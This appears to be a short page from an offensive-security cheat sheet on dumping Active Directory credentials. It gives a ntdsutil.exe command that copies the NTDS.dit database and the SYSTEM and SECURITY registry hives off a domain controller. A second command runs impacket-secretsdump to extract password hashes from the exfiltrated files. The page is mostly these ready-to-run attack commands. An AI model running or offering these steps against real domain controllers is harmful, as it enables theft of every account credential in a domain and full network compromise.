NTDSUtil

NTDSUtil is a command-line tool in Windows Server used for managing the NTDS.dit database, including database maintenance, backup and restore, and more.

ntdsutil.exe should be run from the command line on a Domain Controller

Exploit

Windows

## Use ntdsutil.exe to obtain the NTDS.dit file and the SYSTEM and SECURITY hives
ntdsutil.exe "ac i ntds" "ifm" "create full c:\" q q

Linux

## Use impacket-secretsdump To Parse The Exfiltrated Files
impacket-secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit LOCAL

PreviousVolume Shadow Copy Nextunattend.xml

Last updated 1 year ago